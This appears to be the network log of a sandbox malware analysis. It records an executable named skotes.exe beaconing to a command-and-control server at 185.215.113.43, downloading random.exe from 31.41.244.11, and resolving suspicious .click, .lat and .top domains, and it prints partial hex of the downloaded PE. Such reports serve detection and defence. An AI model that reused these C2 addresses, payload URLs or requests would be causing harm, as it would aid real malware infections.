Dec 22, 2024 02:16:54.335489988 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335506916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335535049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.335546017 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.335783005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.335829020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.336179018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.336224079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.336328983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.336345911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.336373091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.336384058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.336561918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.336605072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.336956978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337001085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337075949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337091923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337115049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337126970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337352991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337394953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337732077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337785959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337863922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337882042 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.337905884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.337917089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.338140965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.338187933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.338553905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.338599920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.338665009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.338681936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.338706970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.338721037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.338962078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.338999987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.339319944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.339396000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.339441061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.339458942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.339483023 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.339495897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.339728117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.339771032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.340106010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.340152025 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.340212107 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.340229034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.340255976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.340267897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.340502024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.340547085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:54.340888977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:54.340939999 CET	49872	80	192.168.2.4	31.41.244.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 22, 2024 02:16:27.549091101 CET	192.168.2.4	1.1.1.1	0x89e5	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:34.162172079 CET	192.168.2.4	1.1.1.1	0x460b	Standard query (0)	cheapptaxysu.click	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:48.390669107 CET	192.168.2.4	1.1.1.1	0x89c5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:51.563082933 CET	192.168.2.4	1.1.1.1	0x4272	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:57.035006046 CET	192.168.2.4	1.1.1.1	0x2ff7	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:59.012953997 CET	192.168.2.4	1.1.1.1	0x5ed6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:00.674660921 CET	192.168.2.4	1.1.1.1	0x3d19	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:00.675098896 CET	192.168.2.4	1.1.1.1	0x4dbe	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 22, 2024 02:17:06.876049995 CET	192.168.2.4	1.1.1.1	0x70ee	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:06.876180887 CET	192.168.2.4	1.1.1.1	0x7176	Standard query (0)	home.fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:17:12.273668051 CET	192.168.2.4	1.1.1.1	0xf20e	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:12.273794889 CET	192.168.2.4	1.1.1.1	0x668c	Standard query (0)	home.fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:17:36.725620031 CET	192.168.2.4	1.1.1.1	0x2384	Standard query (0)	fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:36.725728035 CET	192.168.2.4	1.1.1.1	0x13d	Standard query (0)	fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:17:40.033937931 CET	192.168.2.4	1.1.1.1	0x2f6e	Standard query (0)	fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:40.033998966 CET	192.168.2.4	1.1.1.1	0x9cb7	Standard query (0)	fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:17:47.950272083 CET	192.168.2.4	1.1.1.1	0x32f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:47.951442957 CET	192.168.2.4	1.1.1.1	0x54cc	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 22, 2024 02:17:50.734246969 CET	192.168.2.4	1.1.1.1	0x710f	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:51.632272959 CET	192.168.2.4	1.1.1.1	0x90f8	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:52.164628029 CET	192.168.2.4	1.1.1.1	0x54f5	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:08.174432039 CET	192.168.2.4	1.1.1.1	0x544b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:08.174550056 CET	192.168.2.4	1.1.1.1	0xbedd	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 22, 2024 02:18:09.608649969 CET	192.168.2.4	1.1.1.1	0xf7c0	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:09.812504053 CET	192.168.2.4	1.1.1.1	0x8c9c	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:22.492811918 CET	192.168.2.4	1.1.1.1	0xe436	Standard query (0)	fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:22.492923021 CET	192.168.2.4	1.1.1.1	0x8ac3	Standard query (0)	fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:18:22.633333921 CET	192.168.2.4	1.1.1.1	0xe436	Standard query (0)	fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:23.435331106 CET	192.168.2.4	1.1.1.1	0x75c6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:23.435331106 CET	192.168.2.4	1.1.1.1	0x5867	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 22, 2024 02:18:25.423273087 CET	192.168.2.4	1.1.1.1	0x8391	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:25.426515102 CET	192.168.2.4	1.1.1.1	0xf0a4	Standard query (0)	home.fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:18:25.426580906 CET	192.168.2.4	1.1.1.1	0x8391	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:25.743284941 CET	192.168.2.4	1.1.1.1	0xdbb7	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:25.743391037 CET	192.168.2.4	1.1.1.1	0xdfc1	Standard query (0)	home.fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:18:26.011066914 CET	192.168.2.4	1.1.1.1	0xf2c7	Standard query (0)	home.fivetk5sb.top	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:26.011190891 CET	192.168.2.4	1.1.1.1	0xf6b1	Standard query (0)	home.fivetk5sb.top	28	IN (0x0001)	false
Dec 22, 2024 02:18:42.555706978 CET	192.168.2.4	1.1.1.1	0x6522	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:42.810885906 CET	192.168.2.4	1.1.1.1	0x93c4	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:45.266242981 CET	192.168.2.4	1.1.1.1	0xd7d2	Standard query (0)	fieldhitty.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 22, 2024 02:16:27.859587908 CET	1.1.1.1	192.168.2.4	0x89e5	No error (0)	pancakedipyps.click		172.67.209.202	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:27.859587908 CET	1.1.1.1	192.168.2.4	0x89e5	No error (0)	pancakedipyps.click		104.21.23.76	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:34.494499922 CET	1.1.1.1	192.168.2.4	0x460b	No error (0)	cheapptaxysu.click		104.21.67.146	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:34.494499922 CET	1.1.1.1	192.168.2.4	0x460b	No error (0)	cheapptaxysu.click		172.67.177.88	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:48.528287888 CET	1.1.1.1	192.168.2.4	0x89c5	No error (0)	drive.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:51.699871063 CET	1.1.1.1	192.168.2.4	0x4272	No error (0)	drive.usercontent.google.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:57.172583103 CET	1.1.1.1	192.168.2.4	0x2ff7	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:16:59.150551081 CET	1.1.1.1	192.168.2.4	0x5ed6	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:00.961848021 CET	1.1.1.1	192.168.2.4	0x3d19	No error (0)	httpbin.org		98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:00.961848021 CET	1.1.1.1	192.168.2.4	0x3d19	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:07.615792990 CET	1.1.1.1	192.168.2.4	0x70ee	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:12.411756039 CET	1.1.1.1	192.168.2.4	0xf20e	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:37.118926048 CET	1.1.1.1	192.168.2.4	0x2384	No error (0)	fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:40.173645020 CET	1.1.1.1	192.168.2.4	0x2f6e	No error (0)	fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:48.086967945 CET	1.1.1.1	192.168.2.4	0x32f	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:48.087941885 CET	1.1.1.1	192.168.2.4	0x54cc	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 22, 2024 02:17:50.959641933 CET	1.1.1.1	192.168.2.4	0x710f	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:52.095386028 CET	1.1.1.1	192.168.2.4	0x90f8	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:52.472418070 CET	1.1.1.1	192.168.2.4	0x54f5	No error (0)	discokeyus.lat		104.21.21.99	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:17:52.472418070 CET	1.1.1.1	192.168.2.4	0x54f5	No error (0)	discokeyus.lat		172.67.197.170	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:08.311718941 CET	1.1.1.1	192.168.2.4	0xbedd	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 22, 2024 02:18:08.311846018 CET	1.1.1.1	192.168.2.4	0x544b	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:09.745467901 CET	1.1.1.1	192.168.2.4	0xf7c0	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:09.951248884 CET	1.1.1.1	192.168.2.4	0x8c9c	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:22.634551048 CET	1.1.1.1	192.168.2.4	0xe436	No error (0)	fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:22.772747993 CET	1.1.1.1	192.168.2.4	0xe436	No error (0)	fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:23.572068930 CET	1.1.1.1	192.168.2.4	0x75c6	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:23.572103024 CET	1.1.1.1	192.168.2.4	0x5867	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 22, 2024 02:18:25.591751099 CET	1.1.1.1	192.168.2.4	0x8391	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:25.591842890 CET	1.1.1.1	192.168.2.4	0x8391	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:25.881067991 CET	1.1.1.1	192.168.2.4	0xdbb7	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:26.148940086 CET	1.1.1.1	192.168.2.4	0xf2c7	No error (0)	home.fivetk5sb.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:42.693589926 CET	1.1.1.1	192.168.2.4	0x6522	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:42.952872038 CET	1.1.1.1	192.168.2.4	0x93c4	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:45.577824116 CET	1.1.1.1	192.168.2.4	0xd7d2	No error (0)	fieldhitty.click		104.21.89.115	A (IP address)	IN (0x0001)	false
Dec 22, 2024 02:18:45.577824116 CET	1.1.1.1	192.168.2.4	0xd7d2	No error (0)	fieldhitty.click		172.67.141.124	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49753	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:06.006340981 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:16:07.338330030 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:08.962471008 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 22, 2024 02:16:10.341069937 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 31 33 0d 0a 20 3c 63 3e 31 30 31 39 38 30 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 65 30 36 64 39 64 34 61 34 33 62 61 34 61 65 38 31 63 31 36 30 33 34 37 39 39 64 32 65 30 31 37 62 66 65 33 64 31 34 38 32 62 23 31 30 31 39 38 30 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 39 38 30 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 63 37 61 39 64 35 31 34 33 61 36 35 61 65 30 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 39 38 30 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 [TRUNCATED] Data Ascii: 513 <c>1019800001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbe06d9d4a43ba4ae81c16034799d2e017bfe3d1482b#1019801001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1019802001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcc7a9d5143a65ae003564d5b9cd3e956b7b5d1#1019803001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd1779b464dac58eb03564d5b9cd3e956b7b5d1#1019804001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e80454db045e5404b5a0dc093f619bca9db5d60e66725#1019805001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1019806001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1019807001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1019808001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1019809001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca3080 [TRUNCATED]
Dec 22, 2024 02:16:10.341134071 CET	124	IN	Data Raw: 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 39 38 31 31 30 30 31 2b 2b 2b 66 63 38 Data Ascii: 9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1019811001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e
Dec 22, 2024 02:16:10.575788975 CET	130	IN	Data Raw: 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 39 38 31 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 Data Ascii: 8fcf7b8c730804042ba5ce902415450#1019812001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49765	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:10.704891920 CET	65	OUT	GET /files/Krokodyl02/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:12.042447090 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:11 GMT Content-Type: application/octet-stream Content-Length: 2668544 Last-Modified: Sat, 21 Dec 2024 08:45:32 GMT Connection: keep-alive ETag: "6766802c-28b800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%Gra)!a)!a)!** l)!, )!- r)!p-* s)!p-- q)!p-, G)!( d)!a(!?)!-! `)!-!`)!-+ `)!Richa)!PELeg&P#&@)(@'<'}(j'T@'@&@.text&& `.rdata,&&@@.data''@.fptable''@.rsrc}''@@.relocj(lL(@B
Dec 22, 2024 02:16:12.042486906 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 10 8b c1 69 4d 14 53 72 84 7a 89 45 fc c1 7d fc fd 98 01 05 Data Ascii: UiMSrzE}gB%f+gSVuW=4gEEiN=YiSrz=4g8{Muuabb}@M=4gUr2i]{/eMie+m~]yf[
Dec 22, 2024 02:16:12.042541027 CET	1236	IN	Data Raw: ea d2 27 57 73 e9 77 06 00 00 81 fb c1 d8 7b 2f 73 38 0f af 05 1c c9 67 00 8a 4d fc 80 c1 43 66 d3 3d 00 c9 67 00 a3 1c c9 67 00 b8 61 09 cf e9 2b c2 03 d8 b8 9b ff 00 00 2b 45 10 66 01 05 0c c9 67 00 33 d2 e9 37 06 00 00 81 f9 5e 77 a5 28 75 67 Data Ascii: 'Wsw{/s8gMCf=gga++Efg37^w(ugfEfLgm2MEgfgg,g-ggggiApO}+-gfH@rc?'fLg+E$:M8gg
Dec 22, 2024 02:16:12.042712927 CET	1236	IN	Data Raw: bb 47 00 00 98 01 05 24 c9 67 00 e9 9d 01 00 00 81 ff 66 af 48 40 75 2b 0f b6 05 03 c9 67 00 81 eb b6 2d be 49 0f b6 cb 81 c2 26 87 3c 64 0f af c8 81 6d 08 9f 86 1c 76 88 0d 03 c9 67 00 e9 6a 01 00 00 3b 5d 14 76 47 8b 45 14 01 15 30 c9 67 00 05 Data Ascii: G$gfH@u+g-I&<dmvgj;]vGE0gkU<gM;3GE@giE "-@qM-gE;3Gsu)gfc@gfHgAgeEgii^w(MgEeg~}
Dec 22, 2024 02:16:12.042751074 CET	1236	IN	Data Raw: b8 bc ba ff ff 2b c2 d3 fe 8b 4d f4 ba 0e 2a 01 db 0f b7 c0 89 85 44 ff ff ff a1 04 c9 67 00 89 85 7c ff ff ff 66 a1 00 c9 67 00 89 75 c4 66 89 45 e6 e9 19 01 00 00 01 15 30 c9 67 00 b8 22 7f 00 00 89 85 68 ff ff ff 81 c2 d8 47 f6 63 89 85 60 ff Data Ascii: +M*Dg\|fgufE0g"hGc`iUfHgimffPLfHgEQ}UfLgfETaEEfLgiU`TJ+Eagu``@TEE4[\|i
Dec 22, 2024 02:16:12.042784929 CET	1236	IN	Data Raw: c0 89 45 84 89 85 70 ff ff ff 33 c0 89 45 a0 89 45 bc a0 02 c9 67 00 89 45 b8 8b 85 64 ff ff ff 89 85 6c ff ff ff 66 89 7d ee e9 c6 1f 00 00 3b 45 c0 0f 83 38 01 00 00 0f af 85 74 ff ff ff 81 e9 95 e2 56 0d 0f b7 35 10 c9 67 00 81 ea c8 74 01 36 Data Ascii: Ep3EEgEdlf};E8tV5gt6uE*HXEtEMEEEgEEI'5$gMM}m<M+UME\|Mf(g+\|}gf}gf+
